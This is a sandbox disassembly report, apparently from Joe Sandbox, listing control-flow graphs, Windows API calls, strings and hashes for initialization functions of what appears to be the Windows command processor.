                                                                                          control_flow_graph 643 7ff6a0e84d5c-7ff6a0e84e4b InitializeCriticalSection call 7ff6a0e858e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff6a0e80580 call 7ff6a0e84a14 call 7ff6a0e84ad0 call 7ff6a0e85554 GetCommandLineW 654 7ff6a0e84e4d-7ff6a0e84e54 643->654 654->654 655 7ff6a0e84e56-7ff6a0e84e61 654->655 656 7ff6a0e84e67-7ff6a0e84e7b call 7ff6a0e82e44 655->656 657 7ff6a0e851cf-7ff6a0e851e3 call 7ff6a0e73278 call 7ff6a0e84c1c 655->657 662 7ff6a0e851ba-7ff6a0e851ce call 7ff6a0e73278 call 7ff6a0e84c1c 656->662 663 7ff6a0e84e81-7ff6a0e84ec3 GetCommandLineW call 7ff6a0e813e0 call 7ff6a0e7ca40 656->663 662->657 663->662 674 7ff6a0e84ec9-7ff6a0e84ee8 call 7ff6a0e8417c call 7ff6a0e82394 663->674 678 7ff6a0e84eed-7ff6a0e84ef5 674->678 678->678 679 7ff6a0e84ef7-7ff6a0e84f1f call 7ff6a0e7aa54 678->679 682 7ff6a0e84f95-7ff6a0e84fee GetConsoleOutputCP GetCPInfo call 7ff6a0e851ec GetProcessHeap HeapAlloc 679->682 683 7ff6a0e84f21-7ff6a0e84f30 679->683 689 7ff6a0e85012-7ff6a0e85018 682->689 690 7ff6a0e84ff0-7ff6a0e85006 GetConsoleTitleW 682->690 683->682 684 7ff6a0e84f32-7ff6a0e84f39 683->684 684->682 686 7ff6a0e84f3b-7ff6a0e84f77 call 7ff6a0e73278 GetWindowsDirectoryW 684->686 696 7ff6a0e84f7d-7ff6a0e84f90 call 7ff6a0e83c24 686->696 697 7ff6a0e851b1-7ff6a0e851b9 call 7ff6a0e84c1c 686->697 692 7ff6a0e8507a-7ff6a0e8507e 689->692 693 7ff6a0e8501a-7ff6a0e85024 call 7ff6a0e83578 689->693 690->689 691 7ff6a0e85008-7ff6a0e8500f 690->691 691->689 698 7ff6a0e850eb-7ff6a0e85161 GetModuleHandleW GetProcAddress * 3 692->698 699 7ff6a0e85080-7ff6a0e850b3 call 7ff6a0e9b89c call 7ff6a0e7586c call 7ff6a0e73240 call 7ff6a0e83448 692->699 693->692 707 7ff6a0e85026-7ff6a0e85030 693->707 696->682 697->662 704 7ff6a0e85163-7ff6a0e85167 698->704 705 7ff6a0e8516f 698->705 724 7ff6a0e850b5-7ff6a0e850d0 call 7ff6a0e83448 * 2 699->724 725 7ff6a0e850d2-7ff6a0e850d7 call 7ff6a0e73278 699->725 704->705 710 7ff6a0e85169-7ff6a0e8516d 704->710 706 7ff6a0e85172-7ff6a0e851af free call 7ff6a0e88f80 705->706 712 7ff6a0e85075 call 7ff6a0e9cff0 707->712 713 7ff6a0e85032-7ff6a0e85059 GetStdHandle GetConsoleScreenBufferInfo 707->713 710->705 710->706 712->692 717 7ff6a0e8505b-7ff6a0e85067 713->717 718 7ff6a0e85069-7ff6a0e85073 713->718 717->692 718->692 718->712 729 7ff6a0e850dc-7ff6a0e850e6 GlobalFree 724->729 725->729 729->698
                                                                                          APIs
                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84D9A
                                                                                            • Part of subcall function 00007FF6A0E858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6A0E9C6DB), ref: 00007FF6A0E858EF
                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84DBB
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E84DCA
                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84DE0
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E84DEE
                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E04
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E80589
                                                                                            • Part of subcall function 00007FF6A0E80580: SetConsoleMode.KERNELBASE ref: 00007FF6A0E8059E
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E805AF
                                                                                            • Part of subcall function 00007FF6A0E80580: GetConsoleMode.KERNELBASE ref: 00007FF6A0E805C5
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E805EF
                                                                                            • Part of subcall function 00007FF6A0E80580: GetConsoleMode.KERNELBASE ref: 00007FF6A0E80605
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E80632
                                                                                            • Part of subcall function 00007FF6A0E80580: SetConsoleMode.KERNELBASE ref: 00007FF6A0E80647
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                            • Part of subcall function 00007FF6A0E84A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                            • Part of subcall function 00007FF6A0E84A14: memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                            • Part of subcall function 00007FF6A0E84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                            • Part of subcall function 00007FF6A0E84AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AD6
                                                                                            • Part of subcall function 00007FF6A0E84AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AEF
                                                                                            • Part of subcall function 00007FF6A0E85554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6A0E84E35), ref: 00007FF6A0E855DA
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85623
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85667
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E856BE
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85702
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E35
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E81
                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84F69
                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84F95
                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FB0
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FC1
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FD8
                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FF8
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85037
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8504B
                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E850DF
                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E850F2
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8510F
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85130
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8514A
                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85175
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                          • API String ID: 1049357271-3021193919
                                                                                          • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                          • Instruction ID: e1fbb0b33235ad749c17925de57da7012b0827dccbeddb00b0dae7ab746efb01
                                                                                          • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                          • Instruction Fuzzy Hash: A6C14071E0BB43B6EA049B21E9141B9B7A1FF89B91F548135D90EC77A1DF3CE449A340
                                                                                          Function 00007FF6A0E83C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 732 7ff6a0e83c24-7ff6a0e83c61 733 7ff6a0e83c67-7ff6a0e83c99 call 7ff6a0e7af14 call 7ff6a0e7ca40 732->733 734 7ff6a0e8ec5a-7ff6a0e8ec5f 732->734 743 7ff6a0e8ec97-7ff6a0e8eca1 call 7ff6a0e8855c 733->743 744 7ff6a0e83c9f-7ff6a0e83cb2 call 7ff6a0e7b900 733->744 734->733 736 7ff6a0e8ec65-7ff6a0e8ec6a 734->736 738 7ff6a0e8412e-7ff6a0e8415b call 7ff6a0e88f80 736->738 744->743 749 7ff6a0e83cb8-7ff6a0e83cbc 744->749 750 7ff6a0e83cbf-7ff6a0e83cc7 749->750 750->750 751 7ff6a0e83cc9-7ff6a0e83ccd 750->751 752 7ff6a0e83cd2-7ff6a0e83cd8 751->752 753 7ff6a0e83cda-7ff6a0e83cdf 752->753 754 7ff6a0e83ce5-7ff6a0e83d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff6a0e83faa-7ff6a0e83fb3 753->755 756 7ff6a0e83fb8 754->756 757 7ff6a0e83d68-7ff6a0e83d6c 754->757 755->752 759 7ff6a0e83fc6-7ff6a0e83fec GetLastError call 7ff6a0e8855c call 7ff6a0e8a5d6 756->759 757->756 758 7ff6a0e83d72-7ff6a0e83dcd towupper GetFullPathNameW 757->758 758->759 760 7ff6a0e83dd3-7ff6a0e83ddd 758->760 763 7ff6a0e83ff1-7ff6a0e84007 call 7ff6a0e8855c _local_unwind 759->763 762 7ff6a0e83de3-7ff6a0e83dfb 760->762 760->763 765 7ff6a0e83e01-7ff6a0e83e11 762->765 766 7ff6a0e840fe-7ff6a0e84119 call 7ff6a0e8855c _local_unwind 762->766 774 7ff6a0e8400c-7ff6a0e84022 GetLastError 763->774 765->766 770 7ff6a0e83e17-7ff6a0e83e28 765->770 775 7ff6a0e8411a-7ff6a0e8412c call 7ff6a0e7ff70 call 7ff6a0e8855c 766->775 773 7ff6a0e83e2c-7ff6a0e83e34 770->773 773->773 776 7ff6a0e83e36-7ff6a0e83e3f 773->776 777 7ff6a0e84028-7ff6a0e8402b 774->777 778 7ff6a0e83e95-7ff6a0e83e9c 774->778 775->738 782 7ff6a0e83e42-7ff6a0e83e55 776->782 777->778 783 7ff6a0e84031-7ff6a0e84047 call 7ff6a0e8855c _local_unwind 777->783 779 7ff6a0e83ecf-7ff6a0e83ed3 778->779 780 7ff6a0e83e9e-7ff6a0e83ec2 call 7ff6a0e82978 778->780 785 7ff6a0e83f08-7ff6a0e83f0b 779->785 786 7ff6a0e83ed5-7ff6a0e83ef7 GetFileAttributesW 779->786 792 7ff6a0e83ec7-7ff6a0e83ec9 780->792 788 7ff6a0e83e57-7ff6a0e83e60 782->788 789 7ff6a0e83e66-7ff6a0e83e8f GetFileAttributesW 782->789 799 7ff6a0e8404c-7ff6a0e84062 call 7ff6a0e8855c _local_unwind 783->799 796 7ff6a0e83f0d-7ff6a0e83f11 785->796 797 7ff6a0e83f1e-7ff6a0e83f40 SetCurrentDirectoryW 785->797 793 7ff6a0e83efd-7ff6a0e83f02 786->793 794 7ff6a0e84067-7ff6a0e84098 GetLastError call 7ff6a0e8855c _local_unwind 786->794 788->789 798 7ff6a0e83f9d-7ff6a0e83fa5 788->798 789->774 789->778 792->779 792->799 793->785 801 7ff6a0e8409d-7ff6a0e840b3 call 7ff6a0e8855c _local_unwind 793->801 794->801 803 7ff6a0e83f46-7ff6a0e83f69 call 7ff6a0e8498c 796->803 804 7ff6a0e83f13-7ff6a0e83f1c 796->804 797->803 805 7ff6a0e840b8-7ff6a0e840de GetLastError call 7ff6a0e8855c _local_unwind 797->805 798->782 799->794 801->805 815 7ff6a0e840e3-7ff6a0e840f9 call 7ff6a0e8855c _local_unwind 803->815 816 7ff6a0e83f6f-7ff6a0e83f98 call 7ff6a0e8417c 803->816 804->797 804->803 805->815 815->766 816->775
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                          • String ID: :
                                                                                          • API String ID: 1809961153-336475711
                                                                                          • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                          • Instruction ID: b8a44fdce79a4800a4894f883ad31d0925d64bf8fe5ab330c41f98648fe6d147
                                                                                          • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                          • Instruction Fuzzy Hash: 81D15272B0EB87A1EA64DB25E4542BAB7A1FF84740F444136EA4E837A5DF3CE548D700
                                                                                          Function 00007FF6A0E82394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 914 7ff6a0e82394-7ff6a0e82416 memset call 7ff6a0e7ca40 917 7ff6a0e8241c-7ff6a0e82453 GetModuleFileNameW call 7ff6a0e8081c 914->917 918 7ff6a0e8e0d2-7ff6a0e8e0da call 7ff6a0e84c1c 914->918 923 7ff6a0e82459-7ff6a0e82468 call 7ff6a0e8081c 917->923 924 7ff6a0e8e0db-7ff6a0e8e0ee call 7ff6a0e8498c 917->924 918->924 929 7ff6a0e8e0f4-7ff6a0e8e107 call 7ff6a0e8498c 923->929 930 7ff6a0e8246e-7ff6a0e8247d call 7ff6a0e8081c 923->930 924->929 937 7ff6a0e8e10d-7ff6a0e8e123 929->937 935 7ff6a0e82516-7ff6a0e82529 call 7ff6a0e8498c 930->935 936 7ff6a0e82483-7ff6a0e82492 call 7ff6a0e8081c 930->936 935->936 936->937 947 7ff6a0e82498-7ff6a0e824a7 call 7ff6a0e8081c 936->947 940 7ff6a0e8e13f-7ff6a0e8e17a _wcsupr 937->940 941 7ff6a0e8e125-7ff6a0e8e139 wcschr 937->941 945 7ff6a0e8e181-7ff6a0e8e199 wcsrchr 940->945 946 7ff6a0e8e17c-7ff6a0e8e17f 940->946 941->940 944 7ff6a0e8e27c 941->944 948 7ff6a0e8e283-7ff6a0e8e29b call 7ff6a0e8498c 944->948 950 7ff6a0e8e19c 945->950 946->950 955 7ff6a0e824ad-7ff6a0e824c5 call 7ff6a0e83c24 947->955 956 7ff6a0e8e2a1-7ff6a0e8e2c3 _wcsicmp 947->956 948->956 953 7ff6a0e8e1a0-7ff6a0e8e1a7 950->953 953->953 957 7ff6a0e8e1a9-7ff6a0e8e1bb 953->957 963 7ff6a0e824ca-7ff6a0e824db 955->963 959 7ff6a0e8e1c1-7ff6a0e8e1e6 957->959 960 7ff6a0e8e264-7ff6a0e8e277 call 7ff6a0e81300 957->960 961 7ff6a0e8e1e8-7ff6a0e8e1f1 959->961 962 7ff6a0e8e21a 959->962 960->944 965 7ff6a0e8e201-7ff6a0e8e210 961->965 966 7ff6a0e8e1f3-7ff6a0e8e1f6 961->966 969 7ff6a0e8e21d-7ff6a0e8e21f 962->969 967 7ff6a0e824dd-7ff6a0e824e4 ??_V@YAXPEAX@Z 963->967 968 7ff6a0e824e9-7ff6a0e82514 call 7ff6a0e88f80 963->968 965->962 971 7ff6a0e8e212-7ff6a0e8e218 965->971 966->965 970 7ff6a0e8e1f8-7ff6a0e8e1ff 966->970 967->968 969->948 973 7ff6a0e8e221-7ff6a0e8e228 969->973 970->965 970->966 971->969 975 7ff6a0e8e254-7ff6a0e8e262 973->975 976 7ff6a0e8e22a-7ff6a0e8e231 973->976 975->944 977 7ff6a0e8e234-7ff6a0e8e237 976->977 977->975 978 7ff6a0e8e239-7ff6a0e8e242 977->978 978->975 979 7ff6a0e8e244-7ff6a0e8e252 978->979 979->975 979->977
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                          • API String ID: 2622545777-4197029667
                                                                                          • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                          • Instruction ID: d4e3c3a7c48bde46850cd103560d19cf9a672123c12e4b060ae0efd296dd3108
                                                                                          • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                          • Instruction Fuzzy Hash: 9E917071B0BB83A6EF249B60D8642B967A5FF88B85F544135C90E877A5DF3CE509E300
                                                                                          Function 00007FF6A0E80580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                          • String ID: CMD.EXE
                                                                                          • API String ID: 1606018815-3025314500
                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                          • Instruction ID: 13592d1b1fc6219afe5a667f5be2c6ddea4e6fd0ee6c223e246dda490559e1cc
                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                          • Instruction Fuzzy Hash: A141B135A0BB83ABE7544B24E855178BBA0FF8EB62F959175D90EC3361DF3CA404A710
                                                                                          Function 00007FF6A0E7C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 992 7ff6a0e7c620-7ff6a0e7c66f GetConsoleTitleW 993 7ff6a0e8c5f2 992->993 994 7ff6a0e7c675-7ff6a0e7c687 call 7ff6a0e7af14 992->994 996 7ff6a0e8c5fc-7ff6a0e8c60c GetLastError 993->996 999 7ff6a0e7c689 994->999 1000 7ff6a0e7c68e-7ff6a0e7c69d call 7ff6a0e7ca40 994->1000 998 7ff6a0e8c5e3 call 7ff6a0e73278 996->998 1004 7ff6a0e8c5e8-7ff6a0e8c5ed call 7ff6a0e8855c 998->1004 999->1000 1000->1004 1005 7ff6a0e7c6a3-7ff6a0e7c6ac 1000->1005 1004->993 1007 7ff6a0e7c954-7ff6a0e7c95e call 7ff6a0e8291c 1005->1007 1008 7ff6a0e7c6b2-7ff6a0e7c6c5 call 7ff6a0e7b9c0 1005->1008 1013 7ff6a0e8c5de-7ff6a0e8c5e0 1007->1013 1014 7ff6a0e7c964-7ff6a0e7c972 call 7ff6a0e789c0 1007->1014 1015 7ff6a0e7c6cb-7ff6a0e7c6ce 1008->1015 1016 7ff6a0e7c9b5-7ff6a0e7c9b8 call 7ff6a0e85c6c 1008->1016 1013->998 1014->996 1024 7ff6a0e7c978-7ff6a0e7c99a towupper 1014->1024 1015->1004 1018 7ff6a0e7c6d4-7ff6a0e7c6e9 1015->1018 1023 7ff6a0e7c9bd-7ff6a0e7c9c9 call 7ff6a0e8855c 1016->1023 1021 7ff6a0e8c616-7ff6a0e8c620 call 7ff6a0e8855c 1018->1021 1022 7ff6a0e7c6ef-7ff6a0e7c6fa 1018->1022 1025 7ff6a0e8c627 1021->1025 1022->1025 1026 7ff6a0e7c700-7ff6a0e7c713 1022->1026 1037 7ff6a0e7c9d0-7ff6a0e7c9d7 1023->1037 1029 7ff6a0e7c9a0-7ff6a0e7c9a9 1024->1029 1030 7ff6a0e8c631 1025->1030 1026->1030 1031 7ff6a0e7c719-7ff6a0e7c72c 1026->1031 1029->1029 1034 7ff6a0e7c9ab-7ff6a0e7c9af 1029->1034 1036 7ff6a0e8c63b 1030->1036 1035 7ff6a0e7c732-7ff6a0e7c747 call 7ff6a0e7d3f0 1031->1035 1031->1036 1034->1016 1038 7ff6a0e8c60e-7ff6a0e8c611 call 7ff6a0e9ec14 1034->1038 1047 7ff6a0e7c74d-7ff6a0e7c750 1035->1047 1048 7ff6a0e7c8ac-7ff6a0e7c8af 1035->1048 1042 7ff6a0e8c645 1036->1042 1040 7ff6a0e7c9dd-7ff6a0e8c6da SetConsoleTitleW 1037->1040 1041 7ff6a0e7c872-7ff6a0e7c8aa call 7ff6a0e8855c call 7ff6a0e88f80 1037->1041 1038->1021 1040->1041 1053 7ff6a0e8c64e-7ff6a0e8c651 1042->1053 1049 7ff6a0e7c76a-7ff6a0e7c76d 1047->1049 1050 7ff6a0e7c752-7ff6a0e7c764 call 7ff6a0e7bd38 1047->1050 1048->1047 1052 7ff6a0e7c8b5-7ff6a0e7c8d3 wcsncmp 1048->1052 1056 7ff6a0e7c773-7ff6a0e7c77a 1049->1056 1057 7ff6a0e7c840-7ff6a0e7c84b call 7ff6a0e7cb40 1049->1057 1050->1004 1050->1049 1052->1049 1058 7ff6a0e7c8d9 1052->1058 1059 7ff6a0e7c80d-7ff6a0e7c811 